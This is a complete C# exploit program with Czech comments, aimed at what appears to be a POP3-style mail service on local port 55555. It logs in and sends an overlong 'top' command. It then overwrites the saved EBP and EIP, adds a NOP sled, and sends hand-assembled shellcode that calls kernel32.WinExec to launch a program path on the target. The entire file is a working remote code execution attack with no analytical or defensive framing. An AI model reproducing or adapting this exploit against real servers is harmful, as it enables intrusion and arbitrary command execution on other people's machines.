using System.Net;
using System.Net.Sockets;
using System;
using System.Numeric;
using System.Collections.Generic;
using System.Globalization;
namespace Exploit {
class Program {
static void Main(string[] args) {
IPEndPoint ipep =
new IPEndPoint
(IPAddress.
Parse("127.0.0.1"),
55555);
Socket server =
new Socket
(AddressFamily.
InterNetwork,
SocketType.Stream, ProtocolType.Tcp);
server.Connect(ipep);
System.
Text.
ASCIIEncoding encoding =
new System.
Text.
ASCIIEncoding();
string login = "user apiuser\r\n";
string passwd = "passwd\r\n";
string top = "top 1 123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234";
string end = "\r\n";
byte[] arrayS =
new byte[20];
arrayS = StrToByteArray(login);
server.Send(arrayS);
arrayS = StrToByteArray(passwd);
server.Send(arrayS);
arrayS = StrToByteArray(top);
server.Send(arrayS);
//prepis EBP
String a = "0x01";
String b = "0x01";
String c = "0x01";
String d = "0x01";
Console.WriteLine();
byte a1 = StringToByte(a);
byte b1 = StringToByte(b);
byte c1 = StringToByte(c);
byte d1 = StringToByte(d);
byte[] ahoj =
new byte[] { a1, b1, c1, d1
};
server.Send(ahoj);
//prepis EIP
a = "0xF8";
b = "0x03";
c = "0xFA";
d = "0x77";
a1 = StringToByte(a);
b1 = StringToByte(b);
c1 = StringToByte(c);
d1 = StringToByte(d);
ahoj =
new byte[] { a1, b1, c1, d1
};
server.Send(ahoj);
a = "0x90";
b = "0x90";
c = "0x90";
d = "0x90";
a1 = StringToByte(a);
b1 = StringToByte(b);
c1 = StringToByte(c);
d1 = StringToByte(d);
ahoj =
new byte[] { a1, b1, c1, d1
};
server.Send(ahoj);
a = "0x90";
b = "0x90";
c = "0x90";
d = "0x90";
a1 = StringToByte(a);
b1 = StringToByte(b);
c1 = StringToByte(c);
d1 = StringToByte(d);
ahoj =
new byte[] { a1, b1, c1, d1
};
server.Send(ahoj);
a = "0x90";
b = "0x90";
c = "0x90";
d = "0x90";
a1 = StringToByte(a);
b1 = StringToByte(b);
c1 = StringToByte(c);
d1 = StringToByte(d);
ahoj =
new byte[] { a1, b1, c1, d1
};
server.Send(ahoj);
a = "0xB8";
b = "0x09";
c = "0xFA";
d = "0x12";
String e = "0x10";
a1 = StringToByte(a);
b1 = StringToByte(b);
c1 = StringToByte(c);
d1 = StringToByte(d);
byte e1 = StringToByte(e);
ahoj =
new byte[] { a1, b1, c1, d1, e1
};
server.Send(ahoj);
a = "0xB9";
b = "0xFF";
c = "0xFF";
d = "0xFF";
e = "0x80";
a1 = StringToByte(a);
b1 = StringToByte(b);
c1 = StringToByte(c);
d1 = StringToByte(d);
e1 = StringToByte(e);
ahoj =
new byte[] { a1, b1, c1, d1, e1
};
server.Send(ahoj);
a = "0x23";
b = "0xC1";
a1 = StringToByte(a);
b1 = StringToByte(b);
ahoj =
new byte[] { a1, b1
};
server.Send(ahoj);
a = "0xBD";//adresa kernel32.WinExec
b = "0xFF";
c = "0x54";
d = "0xF7";
e = "0x77";
a1 = StringToByte(a);
b1 = StringToByte(b);
c1 = StringToByte(c);
d1 = StringToByte(d);
e1 = StringToByte(e);
ahoj =
new byte[] { a1, b1, c1, d1, e1
};
server.Send(ahoj);
a = "0xBE";// adresa kernel32 -> call ebp
b = "0x7B";
c = "0x82";
d = "0xF2";
e = "0x77";
a1 = StringToByte(a);
b1 = StringToByte(b);
c1 = StringToByte(c);
d1 = StringToByte(d);
e1 = StringToByte(e);
ahoj =
new byte[] { a1, b1, c1, d1, e1
};
server.Send(ahoj);
b = "0xFF";
c = "0xE6";
a = "0x50";
a1 = StringToByte(a);
b1 = StringToByte(b);
c1 = StringToByte(c);
ahoj =
new byte[] { a1, b1, c1
};
server.Send(ahoj);
String load = "C:\\Program Files\\Bethesda Softworks\\Fallout 3\\FalloutLauncher";
arrayS = StrToByteArray(load);
server.Send(arrayS);
Console.Write("Sended: " + encoding.GetString(arrayS));
arrayS = StrToByteArray(end);
server.Send(arrayS);
Console.Write("Sended: " + encoding.GetString(arrayS));
server.Close();
}
public static byte[] StrToByteArray(string str) {
System.
Text.
ASCIIEncoding encoding =
new System.
Text.
ASCIIEncoding();
return encoding.GetBytes(str);
}
public static byte StringToByte(String hex) {
int cislo;
String mensi = hex.Substring(3);
String vetsi = hex.Substring(2,1);
switch (mensi) {
case "A": {
cislo = 10;
break; }
case "B": {
cislo = 11;
break; }
case "C": {
cislo = 12;
break; }
case "D": {
cislo = 13;
break; }
case "E": {
cislo = 14;
break; }
case "F": {
cislo = 15;
break; }
default:{
cislo = Int32.Parse(mensi);
break;}
}
switch (vetsi) {
case "A": {
cislo += 10*16;
break;
}
case "B": {
cislo += 11*16;
break;
}
case "C": {
cislo += 12*16;
break;
}
case "D": {
cislo += 13*16;
break;
}
case "E": {
cislo += 14*16;
break;
}
case "F": {
cislo += 15*16;
break;
}
default: {
cislo += Int32.Parse(vetsi)*16;
break;
}
}
return (byte)cislo;
}
}
}